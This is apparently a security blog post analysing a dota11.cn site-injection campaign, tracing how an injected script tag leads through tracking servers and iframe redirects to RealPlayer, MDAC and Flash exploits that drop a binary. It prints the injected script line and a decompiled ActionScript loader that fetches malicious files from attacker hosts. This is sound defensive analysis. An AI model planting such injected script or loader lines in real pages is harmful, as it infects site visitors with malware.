sudosecure.net

SQL and XSS site injections have become a standard for spreading malicious code and binaries lately. This is my analysis of the dota11.cn injection that just recently occurred. My goal in doing this analysis is to provide a visual picture into how these types of injections work and the methodologies behind them. First off here is a Site Map for the current mappings of the dota11.cn injection:

As you can see from the Site Map these types of injections server as the gateways to a much larger schema of user tracking, malicious code, and exploit serving web pages and/or scripts. Now let me attempt to walk you through the logic for this schema.

hxxp://www.dota11.cn/m.js

This is the entry page for this injection. The following is the actual code injected into a vulnerable web site:

<script src=hxxp://www.dota11.cn/m.js>

A simple script src= will automatically include the malicious code from the above URL, which is why it is injected into the vulnerable web site in the first place. The m.js file contains a simple JavaScript that is used to non intrusively redirect you to a statistics gathering server. This will allow the malicious designer of this schema to track users, system configurations, and traffic flows as you are involuntarily redirected through this maze of hostile content. The statistical gathering server is located here: web.51.la/go.asp. The other portion of the m.js file contains simple logic to rendor one of two iframe redirections based off your browsers language settings. If you have the Chinese language back configured you will be directed to: windows.loveyoushipin.com/ing/le.htm, and if you don't have it configured you will be directed to: www.dota11.cn/dj.htm. The last and final portion of the m.js script will direct you via an iframe to: www.woai117.cn/123.htm. You can view the original m.js source code here in PDF format: M.js Source Code.

hxxp://windows.loveyoushipin.com/ing/le.htm

You will only receive this iframe redirection if your browser is configured to use the Chinese Language pack. The le.htm file will attempt to server a Real Player exploit (CVE-2007-5601) to you and more information on this vulnerability can be found here: Vulnerability Summary CVE-2007-5601. The other portion of this script will covertly redirect you to a short JavaScript at hxxp://js.users.51.la/1662569.js, which is the configuration gathering script that will submit your information to the statistics gather web server: vip2.51.la/go.asp. Strategically placing these statistic gathering scripts allows the malicious site designer to track their logic flows and exploit attempts to gauge how successful his or her design is. You can view the original le.htm and 1662569.js source sode here in PDF format: 1662569_js. Source Code and le_htm Source Code

hxxp://www.dota11.cn/dj.htm

You will receive this iframe redirection if your browser is not configured to use the Chinese Language pack. This file appears to be the most complex piece to this malicious schema with several logically choosen exploits being severed up and is obfusticated to prevent detection and deter analysis. The first attempt at serving up malicious content is targeted at an old vulnerability in the Microsoft Data Access Components (MDAC) Function (MS06-014). If your configuration doesn't throw an error on the creation of the Adobe.Stream object you will be iframed redirected to hxxp://www.dota11.cn/14.htm, where the malicious binary bak.exe will be downloaded to your computer from hxxp://www.woai117.cn/bak.exe via the MDAC vulnerability being exploited. If your configuration throws an error a Real Player vulnerability will be probed for. Here is the vulnerability summary information: CVE-2007-5601 and is the same vulnerability that was seen in the le.htm file earlier. If this probe does not throw an error you will be redirected to xxp://www.dota11.cn/rl.htm, where this vulnerability will be attempted to be exploited. If the above Real Player vulnerability probe fails and throws an error you will be iframe redirected to hxxp://www.dota11.cn/new.htm, where you will receive another attempt at exploiting a more recent Real Player vulnerabilty (CVE-2008-1309). You will also be redirected to hxxp://www.dota11.cn/04.htm which looks like a left behind iframe refrence that the designer forgot to clean up. I say this because I recieved a 404 error when I tryed grabbing this file. The last iframe redirection occurs no matter what the above logic dictated and will lead you to hxxp://www.dota11.cn/123.htm. Here is the source code for the files mentioned in this paragraph: dj_htm Source Code, 14_htm Source Code, rl_htm Source Code, and new_htm Source Code. The decoded version of dj.htm can be seen here: dj_htm_decoded Source Code. VirusTotal bak.exe Results.

hxxp://www.dota11.cn/123.htm and hxxp://www.woai117.cn/123.htm

These two files although hosted on separate domains contain the exact same content. Both of these are serving up malicious Flash Media files. If your using Internet Explorer you will receive this video: hxxp://www.woai117.cn/4561.swf and for all others you will receive this video: hxxp://www.woai117.cn/4562.swf. Both of these utilize some embedded Action Script logic to redirect you to a malicious Flash Media file based off your Flash media player version. For Internet Explorer users the redirect looks like this: hxxp://www.woai117.cn/ + fVersion + i.swf and for all others it looks like this: hxxp://www.woai117.cn/ + fVersion + f.swf. The following exert is from the Action Script being used:

movie '4561.swf' {
// flash 8, total frames: 1, frame rate: 12 fps, 550x400 px, compressed
frame 1 {
var fVersion = /:$version;
loadMovie('hxxp://www.woai117.cn/' + fVersion + 'i.swf', _root);
stop();
}
}

This looks like the same vulnerabilities SANS.org is referencing Adobe Flash Player Vuln and Malicious swf files.

If you have any questions or comments regarding this posting as always feel free to contact me. I hope you enjoyed the change from the normal Storm Worm coverage. Thanks for visiting.